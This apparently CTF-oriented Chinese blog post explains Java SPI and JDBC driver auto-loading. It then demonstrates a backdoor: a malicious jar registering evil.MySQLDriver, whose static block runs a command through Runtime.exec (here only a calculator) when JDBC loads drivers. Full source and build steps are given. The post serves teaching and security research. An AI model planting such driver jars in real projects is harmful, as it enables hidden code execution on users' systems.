【Web】浅浅地聊JDBC java.sql.Driver的SPI后门

已于 2024-03-05 22:27:49 修改
阅读量848 收藏 11
点赞数 13
文章标签: java jdbc spi ctf web driver后门
于 2024-03-05 22:10:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/136486039
版权

目录

SPI定义

SPI核心方法和类

最简单的SPIdemo演示

回顾JCBC基本流程

为什么JDBC要有SPI

JDBC java.sql.Driver后门利用与验证

SPI定义

SPI: Service Provider Interface
官方定义: 直译过来是服务提供者接口,学名为服务发现机制
它通过在ClassPath路径下的META-INF/services文件夹中查找文件(以接口名为文件名,以实现类全限定名为文件内容的文件),并自动加载文件里所定义的类

1.SPI机制能够使接口与具体的实现类解耦,可以根据实际的业务情况启用或替换具体组件
2.SPI机制为很多框架的拓展提供了可能
3.SPI机制更多是一种思想

SPI核心方法和类

Java SPI(Service Provider Interface)机制主要涉及以下几个核心方法和类:

① java.util.ServiceLoader:ServiceLoader 类是 Java SPI 机制的核心类,用于加载和管理服务提供者。它包含以下常用方法:
        load(Class<S> service):静态方法,用于加载实现了指定接口的服务提供者。
        iterator():返回一个迭代器,用于遍历加载的服务提供者实例。

② java.util.Iterator:Iterator 接口用于遍历集合中的元素,ServiceLoader 返回的迭代器实现了这个接口,常用方法包括:
        hasNext():判断是否还有下一个元素。
        next():返回下一个元素。

③ java.util.spi 包:这个包中包含了一些 SPI 相关的类,例如:
        AbstractProvider:用于创建服务提供者的抽象类。
        ResourceBundleControlProvider:用于提供自定义的 ResourceBundle.Control 对象。

④ META-INF/services/ 目录:在类路径下的 META-INF/services/ 目录中,通常会创建以接口全限定名命名的配置文件,用于指定实现了接口的服务提供者类。

最简单的SPIdemo演示

项目目录:

 META-INF/services/com.spi.SpiService

com.spi.SPI_1
com.spi.SPI_2

SpiService

package com.spi;

public interface SpiService {
    public void run();
}

SPI_1

package com.spi;

public class SPI_1 implements SpiService {
    @Override
    public void run() {
        System.out.println("SPI_1 is running...");
    }
}

SPI_2

package com.spi;

public class SPI_2 implements SpiService {
    @Override
    public void run() {
        System.out.println("SPI_2 is running...");
    }
}

SpiTest

package com.spi;

import java.util.ServiceLoader;

public class SpiTest {
    public static void main(String[] args) {
        ServiceLoader<SpiService> serviceLoader = ServiceLoader.load(SpiService.class);
        for (SpiService spiService : serviceLoader) {
            spiService.run();
        }
    }
}

运行演示

回顾JCBC基本流程

1.加载数据库驱动程序:
首先,需要加载数据库厂商提供的 JDBC 驱动程序,以便与特定的数据库进行通信。可以通过 Class.forName("com.mysql.cj.jdbc.Driver") 这样的语句来加载驱动程序。

2.建立数据库连接获得Connection对象:
使用 DriverManager.getConnection(url, username, password) 方法来建立与数据库的连接。在这里,url 是数据库的地址、端口等连接信息,username 和 password 是登录数据库所需的用户名和密码。

3.创建 Statement 对象:
通过 Connection.createStatement() 方法创建一个 Statement 对象,用于向数据库发送 SQL 语句并执行查询。

4.执行 SQL 语句:
使用 Statement.executeQuery(sql) 方法来执行 SELECT 查询语句,或者使用 Statement.executeUpdate(sql) 方法来执行 INSERT、UPDATE、DELETE 等更新操作语句。

5.处理结果集:
如果执行的是 SELECT 查询语句,会返回一个 ResultSet 对象,其中包含了查询结果集。可以使用 ResultSet.next() 方法遍历结果集,并通过 ResultSet.getXXX() 方法获取具体的字段值。

为什么JDBC要有SPI

以前我们使用JDBC访问Mysql数据库的时候,都会执行Class.forName("com.mysql.cj.jdbc.Driver"),这样就会实例化驱动类,同时也会执行驱动类中的static代码块中的DriverManager.registerDriver(new Driver()),将驱动类注册到Drivermanager中

但是将驱动类的全路径名称写到代码中,非常不方便。如果将类的全路径名写到配置文件中,虽然方便,但是还需要我们去记驱动类的全路径名

使用Java的SPI就可以解决这个问题。让Mysql驱动提供方同时提供驱动包和驱动配置文件,Java SPI通过类ClassLoader(通过getResource/getResources从指定位置读取classpath中的配置文件、可以加载类)自动从指定位置读取配置文件并进行驱动类的加载。这样就不用我们进行驱动类的加载了,而且Mysql驱动提供方能很方便的进行驱动的升级

JDBC java.sql.Driver后门利用与验证

数据库厂商提供的 JDBC 驱动程序通过在 JAR 包中的 META-INF/services/java.sql.Driver 文件中指定实现了 java.sql.Driver 接口的驱动程序类的方式来注册自己。JDBC 在启动时会使用 SPI 机制来动态加载这些驱动程序类,无需显式地调用 Class.forName 来加载驱动程序,从而实现了自动注册数据库驱动程序的功能。

这也为我们留下了后门,我们可以创建一个自己的恶意jar包传给JDBC,从而导致恶意类的加载,静态代码块的执行,开始复现!

先生成恶意的jar包

创建项目结构如下

 META-INF/services/java.sql.Driver

evil.MySQLDriver

MySQLDriver.java

package evil;

import java.sql.*;
import java.util.*;
import java.util.logging.*;

public class MySQLDriver implements java.sql.Driver {

    protected static boolean DEBUG = false;

    protected static final String WindowsCmd = "calc";

    protected static final String LinuxCmd = "open -a calculator";

    protected static  String shell;

    protected static  String args;

    protected static  String cmd;



    static{
        if(DEBUG){
            Logger.getGlobal().info("Entered static JDBC driver initialization block, executing the payload...");
        }


        if( System.getProperty("os.name").toLowerCase().contains("windows") ){

            shell = "cmd.exe";
            args = "/c";
            cmd = WindowsCmd;
        } else {

            shell = "/bin/sh";
            args = "-c";
            cmd = LinuxCmd;
        }
        try{

            Runtime.getRuntime().exec(new String[] {shell, args, cmd});

        } catch(Exception ignored) {

        }
    }




    // JDBC methods below


    public boolean acceptsURL(String url){
        if(DEBUG){
            Logger.getGlobal().info("acceptsURL() called: "+url);
        }

        return false;
    }

    public Connection connect(String url, Properties info){
        if(DEBUG){
            Logger.getGlobal().info("connect() called: "+url);
        }

        return null;
    }


    public int getMajorVersion(){
        if(DEBUG){
            Logger.getGlobal().info("getMajorVersion() called");
        }

        return 1;
    }

    public int getMinorVersion(){
        if(DEBUG){
            Logger.getGlobal().info("getMajorVersion() called");
        }

        return 0;
    }

    public Logger getParentLogger(){
        if(DEBUG){
            Logger.getGlobal().info("getParentLogger() called");
        }

        return null;
    }

    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info){
        if(DEBUG){
            Logger.getGlobal().info("getPropertyInfo() called: "+url);
        }

        return new DriverPropertyInfo[0];
    }

    public boolean jdbcCompliant(){
        if(DEBUG){
            Logger.getGlobal().info("jdbcCompliant() called");
        }

        return true;
    }
}

 依次运行下列代码

javac src/evil/MySQLDriver.java

jar -cvf evil.jar -C src/ .

在项目目录得到evil.jar这个恶意jar包

然后在JDBC的项目中引入恶意jar包

package com.spi;

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class Jdbc_Demo {
    public static void main(String[] args) throws Exception {
        // 注册驱动(可以删去)
//        Class.forName("java.sql.Driver");
        // 获取数据库连接对象
        Connection con = DriverManager.getConnection("jdbc:mysql://localhost:3306/security","root", "root");
        //  定义sql语句
        String sql = "select * from users";
        // 获取执行sql的对象Statement
        Statement stmt = con.createStatement();
        // 执行sql
        ResultSet res = stmt.executeQuery(sql);
        // 处理对象
        while(res.next()) {
            System.out.println(res.getString("username"));
        }
        // 释放资源
        res.close();
        stmt.close();
        con.close();
    }
}

 运行这段代码便可弹出计算器。

为了验证我们真的导入了恶意类作为jdbc的驱动,我们可以继续运行下面这段代码

package com.spi;

import java.sql.Driver;
import java.util.Iterator;
import java.util.ServiceLoader;

public class JdbcDriverList {
    public static void main(String[] args) {

        ServiceLoader<Driver> serviceLoader = ServiceLoader.load(Driver.class, ClassLoader.getSystemClassLoader( ));

        for(Iterator<Driver> iterator = serviceLoader.iterator(); iterator.hasNext();) {

            Driver driver = iterator.next();

            System.out.println(driver.getClass().getPackage() + " ------> " + driver.getClass().getName());
        }
    }
}

结果如下,可见我们确实利用driver后门完成了一次偷梁换柱的利用

Z3r4y
关注
  • 13
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java_sql数据库驱动
01-06
数据库sqlserver驱动,java连接sqlserver数据库的核心驱动
java连接数据库jdbc步骤——浅浅笔记
06-17
有两种方式加载驱动:一种是使用反射方式进行驱动注册,使用 Class.forName("oracle.jdbc.driver.OracleDriver"); 另一种是使用 OracleDriver driver = new OracleDriver(); DriverManager.registerDriver(driver);...
Java数据库驱动集合
miracle_8的博客
12-12 556
总结了一下JAVA连接各种数据库要用到的驱动程序名和url:1、oracledriver:oracle.jdbc.driver.OracleDriver url:"jdbc:oracle:thin:@localhost:"+port+":"+databaseName;2、Sql Server7.0/2000driver:com.microsoft.jdbc.sqlserver.SQLServerDr
java 各种数据库驱动
xiao.yu的博客
12-19 895
java 各种数据库驱动
java.sql.SQLException: No suitable driver(解决)
Linlietao0587的博客
04-21 8600
项目场景: 在SpringBoot项目中,本地测试一切正常。在服务器使用,查看报错日志出现java.sql.SQLException: No suitable driver。排查了很久,终于解决问题。 问题描述 java.sql.SQLException: No suitable driver 翻译过来:mysql没有适合的驱动 原因分析: 本地测试没有问题,服务运行有问题,说明是服务配置错误 这边用的是mysql5.6.5,tomcat8,所以判断是tomcat8配置出现问题 解决方案: 在t
JDK11 使用URLClassLoader加载java.sql.Driver报错问题
weixin_39327352的博客
02-22 610
根据下图,我们可以得知PlatformClassLoader是ClassLoader的子类,并且我们的URLClassLoader可以指定父类加载器,那么我们可以尝试在获取URLClassLoader时,指定PlatformClassLoader加载器为父类加载器,那么根据双亲委派机制,我们加载外部数据库驱动时,就能加载到类java.sql.Driver了,即可完美解决问题。我们调用时并没有指定父类加载器,那么根据下图我们可得知URLClassLoader的父类加载器为SecureClassLoader。
SQL注入.xmind
05-13
使用思维导图形式,总结分析了常见的SQL注入,盲注、报错注入、head注入等等,各个注入相关知识以及方式。
Java后端知识图谱帮助Java初学者成长.rar
06-18
WEB服务器:Weblogic、Tomcat、WebSphere、JBoss、Jetty 核心框架:Spring Framework 分布式服务框架 Dubbo(感谢@浅浅浅丿忧伤指正) 安全框架:Apache Shiro 视图框架:Spring MVC 服务端验证:Hibernate + ...
java在线教务系统.rar
12-30
java在线教务系统
java图书管理系统.zip
12-25
java图书管理系统
mysql类加载_DriverManager类如何利用线程上下文类加载器加载java.sql.Driver实现类
weixin_35480435的博客
02-08 118
1. 测试环境搭建:1. 在pom文件中导入mysql-connector-java依赖mysqlmysql-connector-javaruntime2. 搭建测试类2. DriverManager初始化流程分析2.1 在static静态代码块中执行loadInitialDrivers()方法2.2 在loadInitialDrivers()方法中执ServiceLoader.load(Driv...
java sql2005驱动_Java连接SQL驱动的方式
weixin_39836860的博客
02-13 98
某些JDBC的JAR文件将自动注册驱动器类。包含META-INF/services/java.sql.Driver文件的JAR文件可以自动注册驱动器类,解压缩驱动程序JAR文件就可以检查其是否包含该文件。如果驱动程序JAR文件不支持自动注册,那就需要找出数据库提供商使用的JDBC驱动器类的名字。典型的驱动器名字如下:org.apache.derby.jdbc.ClientDriverorg.pos...
关于java基础--SQL驱动及JDBC连接
荏苒夕阳的博客
07-22 1428
一、SQLJDBC 1,SQL驱动 步骤: (1)设置驱动包调用路径driver (2)设置调用的URL (3)设置用户名username (4)设置用户密码userpass (5)调用驱动包Class.forName(driver) (6)创建获取连接的方法getConnection() (7)配置连接: conn = DriverManager.getConnection(
java.sql.DriverManager获取连接的方式
jupiter_888的博客
12-19 665
线程上下文类加载器 image.png image.png DriverManager image.png image.png
JDBCSPI机制
yangyangrenren的专栏
11-14 523
ServiceLoader方式服务发现进行分析。它是Jdk为我们提供的根据接口动态加载实现类(SPI机制)的工具。 一、问题引出: 当我们在使用原生jdbc时通常写为以下格式: 我们在加载驱动类的时候的静态代码块会帮助我们进行注册,所以我们再DriverManager中能够取得连接。 但事实上,我们去掉第一行Class.forName后,我们依旧可以获得相应数据库的连接,那么数据库驱动类是什么时候加载的呢?虚拟机怎么会知道驱动类的路径呢? 二、准备知识 1、ServiceLoader类的使用。 再次我们只
Java SPI的介绍、JDBCSPI的应用、自己实现一个SPI应用
Bulut0907
01-16 1422
SPI(Service Provider Interface)是一种基于ClassLoader来发现并加载服务的机制。用于实现各种插件或灵活替换框架所使用的组件。设计思想采用:面向接口 + 配置文件 + 反射技术Service:一个公开的接口或抽象类,定义了一个抽象的功能模块Service Provider:Service接口的一个实现类ServiceLoader:是SPI机制中的核心组件,负责在运行时发现并加载Service Provider优点:基于面向接口编程,实现了模块之间的解耦。
jdbc中的spi机制
weixin_44190971的博客
03-08 400
执行获取连接的方法时,会去读取类路径下的 META-INFWE 下的services下的文件,并将其作为接口类用于接收要加载的对象,文件内容则为具体的实现类 在我们这个例子里面就是 mysql的驱动全路径。但是我们也知道静态代码块是在类加载的时候才会被执行(所以这个类一定被加载了),但是我们上面代码并没有去实例化这个类,这个又是谁帮我们去加载的呢?我们在这个类中发现了个静态代码块,其中我们发现了注册的代码,也就是我们的注册是在这里完成的,策略模式的隔离是类级别的隔离,而 SPI 机制是项目级别的隔离。
SPIJDBC
yangyangrenren的专栏
11-14 396
深入理解SPI机制 一、什么是SPI SPI ,全称为 Service Provider Interface,是一种服务发现机制。它通过在ClassPath路径下的META-INF/services文件夹查找文件,自动加载文件里所定义的类。 这一机制为很多框架扩展提供了可能,比如在Dubbo、JDBC中都使用到了SPI机制。我们先通过一个很简单的例子来看下它是怎么用的。 1、小例子 首先,我们需要定义一个接口,SPIService package com.viewscenes.netsupervisor.s
java spijdbc中的使用讲解
biubiubiubibibi的博客
09-20 178
java spijdbc中的使用讲解
blank = np.zeros
最新发布
10-19
blank = np.zeros((800,600,3))是用numpy库创建一个800x600的三通道(RGB)的黑色图像。这个图像可以用来作为画布,然后在上面绘制其他图像或者进行其他图像处理操作。在引用中,这个黑色图像被用来与另一张图像进行融合,生成一张对比度增强后的图像。在引用中,这个黑色图像被用来替换掉原始图像中的某些像素,从而生成一个新的图像。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值